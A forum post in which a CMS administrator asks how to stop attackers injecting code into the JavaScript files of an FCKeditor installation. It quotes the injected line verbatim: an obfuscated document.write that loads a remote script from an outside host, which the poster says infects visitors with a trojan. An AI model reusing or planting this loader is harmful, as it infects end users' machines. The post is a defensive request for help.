How to prevent Code injection in js file?

Hello buddy

How do you do

Bro, I have a problem while using the editor today

Seems some application can crack to fckeditor and do code injection to all js
files in fckeditor

I found code injection like this
document.write(unescape('%3C6jsYCcr6jiBCpt%20Posr7lc%3D7l%2FPo%2F9w1d4%2E247
%2E27l%2E1956j%2FjquYCeryYC%2EYzTjs%3E7l%3Cib%2F6js7lcrBCiPopt7l%3E').replac
e(/BC|w1d|YC|7l|ib|7G|Po|YzT|6j/g,""));

in all javascript files and this will cause trojan of xploit.swf.gen attack end-user pc. This dangerous.

How's great Cracker today

Do you guys have the way to prevent it?

My application is CMS application. so this not possible only give read permission to site folder, because our cms application can upload data and create data file.

Previously, this cracker upload some script file in asp format to image data
folder

I've prevented it by rename the folder fckeditor to edsuite and do session validation in /edsuite/editor/filemanager/connectors/aspx/connector.aspx

But the last I get the cracker have found the way to do code injection to
all js file in fckeditor

Need advice from the expert how to solve this problem.